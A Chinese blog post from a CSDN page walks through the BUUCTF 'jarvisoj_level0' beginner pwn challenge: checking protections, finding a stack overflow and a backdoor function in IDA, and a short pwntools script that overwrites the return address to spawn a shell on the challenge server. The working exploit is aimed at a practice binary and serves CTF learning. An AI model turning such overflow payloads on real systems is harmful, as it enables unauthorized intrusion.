BUUCTF jarvisoj_level0

最新推荐文章于 2024-05-23 21:34:38 发布

Wanglpl

最新推荐文章于 2024-05-23 21:34:38 发布

阅读量110

点赞数

分类专栏： PWN 文章标签： python c语言

本文链接：https://blog.csdn.net/WangLal/article/details/132692467

版权

PWN 专栏收录该内容

7 篇文章 0 订阅

订阅专栏

新手PWN题WP

第一步：查看防护

因为这是新版checkssec,所以命令有所不同
在这里插入图片描述
不过可以从图片中看出除了NX以外其他防护都没开。

用file命令查看架构信息，为64位。

第二步：将文件拖入IDA64位中查看

在这里插入图片描述
很明显的数组越界，导致栈溢出。

查看所需要的填充字节

在这里插入图片描述
很明显的后门函数，可以直接get shell。

思路与脚本

直接利用栈溢出，覆盖返回地址为后面函数的地址

from pwn import*
r = remote('node4.buuoj.cn',25944)
context(arch='amd64', os='linux', log_level='debug')
e = ELF('level0')

sys_addr = 0x0400596
r.recv()
payload1 = b'a'*0x80 + p64(0) + p64(sys_addr)
r.send(payload1)
r.interactive()

get flag成功
在这里插入图片描述

优惠劵

Wanglpl

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
1
评论
BUUCTF jarvisoj_level0

因为这是新版checkssec,所以命令有所不同不过可以从图片中看出除了NX以外其他防护都没开。用file命令查看架构信息，为64位。
复制链接

扫一扫

专栏目录

LRVOSUN.rar_level set_level set model

07-14

A new level set model without initialization, very time effi

Level_Set.zip_level set_level-set_set

07-15

Level Set 程序识别图像很好用的

1 条评论您还未登录，请先登录后发表或查看评论

level_set_image.rar_level set_level set 方程

09-21

图像处理的偏微分方程方法-王大凯第78页的程序

psm.rar_5 LEVEL_level inverter_psim

09-20

5 level inverter psim

DRLSE.rar_distance_drlse_level set_level-set

09-23

matlab code for Distance Regularized Level Set Evolution

【hackmyvm】Slowman靶机

woshicainiao666的博客

05-20

577

发现/secretLOGIN/login.html为登录地址，根据账号密码登录发现一个zip，但是需要密码。在FTP中得到的账号，爆破一下SSH。上传linpeas.sh文件，报一下。SSH爆破无果，试试mysql。得到用户名和加密的密码。

python中用“*”运算符复制列表时子列表实际上引用的是同一个列表，列表和嵌套列表的坑

ThreeS_tones的博客

05-21

188

当你修改了一个子列表的元素时，所有的子列表都会随之改变。因为他们实际上都是同一个子列表的引用。输出如下，可以看到每个子列表中的第5个元素相同，并没有实现从0.8-1.2分布。先看一个例子，我想改变load的子列表中第五个元素，从0.8-1.2分布。的时候，Python实际上。

使用Python操作excel单元格——在单元格中插入公式

xll_007的博客

05-16

898

使用Python操作excel单元格——在单元格中插入公式。通过使用Python的openpyxl库，来操作excel单元格，在单元格中插入公式的操作。把学习的过程分享给大家。大佬勿喷！

python数据分析numpy基础之intersect1d求数组交集

sinat_34735632的博客

05-19

735

python的numpy库的intersect1d(x,y)函数，计算x和y的公共元素，并返回去重后的有序结果。相当于求两个数组中的交集，并且进行去重和排序。numpy.intersect1()查找两个数组的公共元素，并且返回去重后的有序结果。ar1，ar2：必选，列表、元组、数组；如果是多维则自动转一维数组；assume_unique：可选，bool，默认False，若为True则可以加快计算素材，此时ar1和ar2需为元素唯一的数组，否则结果不会去重；

python 图论最短路径

weixin_42490599的博客

05-16

719

在图论中，有许多算法可以用来求解最短路径问题，其中最著名的算法之一是Dijkstra算法。Dijkstra算法用于求解从一个顶点到其他所有顶点的最短路径，它适用于有向无环图（DAG）或无负权边的图。在上面的示例中，dijkstra函数接受一个图（以字典形式表示）和一个起始节点作为参数，然后使用Dijkstra算法来计算从起始节点到其他所有节点的最短距离。最终返回一个包含最短距离的字典。

Python 造数据神器Faker

pythondh1的博客

05-23

530

Faker 是一个用于生成假数据的 Python 包。它能够生成各种类型的数据，包括名字、地址、电话号码、电子邮件、公司名称、文本、日期等。Faker 库特别适合在测试和开发阶段使用，帮助我们模拟现实世界中的数据，提高工作效率。

Python常用标准库模块及查询方法

par@ish的博客

05-21

929

也可以通过python官网查看各个版本自带的标准模块及用法：https://docs.python.org/3.11/library/index.html。Python 自带了许多标准库（模块），这些模块在安装Python时就已经包含在内，无需额外安装即可使用。这只是Python标准库中的一部分模块，实际上Python的标准库非常丰富，覆盖了网络编程、文本处理、数据压缩、GUI编程等多个领域。

注意力机制篇 | MSFE：即插即用的多尺度滑窗注意力（附源码实现）

最新发布

突然好想你

05-23

105

多尺度滑窗注意力（Multi-Scale Sliding Window Attention，MSFE）是一种用于处理图像的深度学习模型。它通过引入多尺度特征提取和滑窗注意力机制来提高图像识别的准确性。🌈

Python求n以内最大的k个素数c

youyouxiong的博客

05-16

292

请注意，这个实现在n很大时可能效率不是很高，因为它需要从n开始递减检查每个数。对于更高效的实现，可以考虑使用埃拉托斯特尼筛法（Sieve of Eratosthenes）先找出n以内的所有素数，然后从列表末尾取最大的k个素数。在Python中，要求一个数n以内最大的k个素数，可以通过编写一个函数来实现。这个函数将首先生成一个素数列表，然后从该列表中选择最大的k个素数。函数用于找出n以内最大的k个素数。它通过从n开始递减检查每个数，并将素数添加到列表中，直到列表长度达到k。函数用于判断一个数是否为素数。

用python进行“个税计算”

算法与编程之美

05-20

249

1 问题企业发放的奖金根据利润来提成。利润(I)低于或等于5万元时，奖金可提10%；利润高于5万元，低于20万元时，低于5万元的部分按10%提成，高于5万元的部分，可提成7.5%；20万到40万之间时，高于20万元的部分，可提成5%；40万到60万之间时高于40万元的部分，可提成3%；60万到100万之间时，高于60万元的部分，可提成1.5%，高于100万元时，超过100万元的部分按1%提成，从键...

找出最大的可达成数字(Lc2769)——数学

qq_51626500的博客

05-21

289

找出最大的可达成数字(Lc2769)——数学

【Python】常用内置函数

hdz_wiz_csdn的博客

05-16

1702

从标准输入设备（通常是键盘）获取用户输入的内容，并返回作为字符串。：返回一个枚举对象，其中包含指定可迭代对象的索引和对应的值。：枚举对象，它生成由索引和可迭代对象中对应元素组成的元组。：返回一个新的列表，其中包含了按指定方式排序的元素。：对所有可迭代的对象进行排序，并返回一个新的列表。：返回一个迭代器，迭代器中的元素是符合条件的元素。：返回指定对象的长度（元素个数、字符个数等）。：返回一个可迭代的range对象。：对象的类型，通常是一个类对象。：对象的长度，通常是一个整数。：返回指定对象的类型。

Python复习（四）

qq_43710593的博客

05-16

153

从起始位置匹配，匹配成功返回位置，匹配失败返回None.扫描整个字符串并返回第一个成功的匹配。实例应用：驼峰式写法转换为下划线写法。一般是可以替换的，这里匹配的是位置。3、re.sub方法——检索和替换。2、re.search方法。1、re.match方法。

泰迪智能科技2024大数据分析/开发/Python数据分析项目班课程大纲

tipdm0526的博客

05-17

331

泰迪智能科技2024大数据分析/开发/Python数据分析项目班课程大纲

jarvisoj_level0

08-14

引用是一段关于利用pwntools库对jarvisoj_level0进行攻击的代码。代码中使用了remote()方法建立了远程连接，并构造了一个payload来利用栈溢出漏洞，最终执行callsystem()函数来获取shell权限。引用也是类似的代码，...

“相关推荐”对你有帮助么？

非常没帮助
没帮助
一般
有帮助
非常有帮助

提交